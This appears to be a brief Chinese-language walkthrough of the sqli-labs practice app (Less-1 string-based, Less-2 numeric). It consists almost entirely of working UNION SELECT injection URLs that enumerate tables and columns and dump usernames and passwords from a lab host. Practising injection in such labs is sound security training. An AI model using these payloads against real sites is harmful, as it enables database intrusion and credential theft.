less1 基于字符串
利用union select联合查询,获取字段名。
http://192.168.8.151:8088/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'-- +
利用union select 联合查询,获取字段值。0x3a是冒号
http://192.168.8.151:8088/Less-1/?id=0' union select 1, group_concat(username,0x3a,password),3 from users-- +
less2 基于数字
这里的limit 0,1表示查询的数据库库名(security)第一个字段的表名
http://192.168.8.151:8088/Less-2/?id=-1 union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),7-- +
http://192.168.8.151:8088/Less-2/?id=-1 union select
1,group_concat(username),group_concat(password) from users-- +